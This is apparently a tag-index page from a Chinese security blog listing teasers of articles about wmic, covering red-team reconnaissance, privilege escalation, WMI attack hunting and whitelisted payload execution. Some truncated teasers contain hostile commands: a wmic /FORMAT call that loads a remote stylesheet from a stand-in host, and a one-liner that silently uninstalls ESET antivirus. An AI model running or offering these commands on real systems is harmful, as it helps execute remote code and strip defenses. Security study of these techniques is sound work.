wmic - 第 4 | CN-SEC 中文网

安全文章

Windows | WMI攻击利用痕迹猎捕

WMI (Windows Management Instrumentation) 是 Microsoft 对 WBEM 标准的实现。WMI 开箱即用，提...

05月09日140 views评论

阅读全文

安全文章

Windows提权辅助脚本

文章前言进入到后渗透阶段就涉及到了提权，而提权的第一步就是信息收集，所以这个脚本因此而诞生~辅助脚本windows提权用到的命令：systeminfonet usernet user user1ipc...

04月09日42 views评论

阅读全文

安全文章

关键证据检索提取-系统用户审查

STATEMENT声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，雷神众测及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此...

02月21日25 views评论

阅读全文

安全文章

渗透测试信息收集自动化脚本

项目地址https://github.com/gysf666/wmic_infowmic_info：渗透测试信息收集自动化脚本执行脚本后，会将信息写入一个HTML文件中wmic_info网盘下载链接:...

01月03日91 views评论

阅读全文

安全闲碎

什么？你还不会本机信息收集？

感谢大家对李趴菜一直以来的支持和热爱，2022也是疫情的第三年，兄弟/姐妹们也陪伴李趴菜走过了五个月的应届生生涯，或许兄弟/姐妹们对我的评价有失落有欣喜...

01月03日20 views评论

阅读全文

安全文章

Hacking with Style, Stylesheets

前言前段时间，@subTee放了一个好玩的red team tips，利用wmic来进行bypass。正文命令如下wmic os get /FORMAT:”https://example.com/ev...

12月11日60 views评论

阅读全文

安全文章

红队的基础CMD命令

系统信息版本和补丁信息wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #获取架构systeminfosysteminfo | f...

12月06日105 views评论

阅读全文

安全文章

内网渗透|域内信息收集（上）

渗透的本质是信息搜集，而信息搜集整理为后续的情报跟进提供了强大的保证。一、内网信息收集概述进入内网后，首先需要对当前网络环境进行判断：• 我是谁：当前机器的角色• 这是哪：当前机器所处网络环境的拓扑结...

10月09日29 views评论

阅读全文

程序逆向

远控免杀专题(53)-白名单WMIC.exe执行payload

声明：Tide安全团队原创文章，转载请声明出处！文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！声明：文中所涉及的技术、思路和工...

07月18日75 views评论

阅读全文

安全文章

挖洞奇遇记

前言：最近一直感觉很忙，但是也没做什么大事，白天就是整理一些文档之类的琐碎小事。晚上就是回家刷会剧，然后刷几个漏洞就到凌晨1 2点了其实这篇文章好久之前就想发的，本来想追求完美，但是就是最后一个环节，...

06月29日46 views已关闭评论

阅读全文

安全文章

一条命令干掉nod32

wmic product where name="ESET Security" call uninstall /nointeractivePS: 管理员权限，可以卸载，但不建议这么做，动静太大，除非长...

05月28日56 views1

阅读全文

wmi一些操作

使用wmic识别安装到系统中的补丁情况 1C:\> wmic qfe get description,installedOn 外部调用获取补丁情况 12select * from Win32_Q...

05月17日安全博客136 views评论

阅读全文

Windows | WMI攻击利用痕迹猎捕

Windows提权辅助脚本

关键证据检索提取-系统用户审查

渗透测试信息收集自动化脚本

什么？你还不会本机信息收集？

Hacking with Style, Stylesheets

红队的基础CMD命令

内网渗透|域内信息收集（上）

远控免杀专题(53)-白名单WMIC.exe执行payload

挖洞奇遇记

一条命令干掉nod32

在线咨询

微信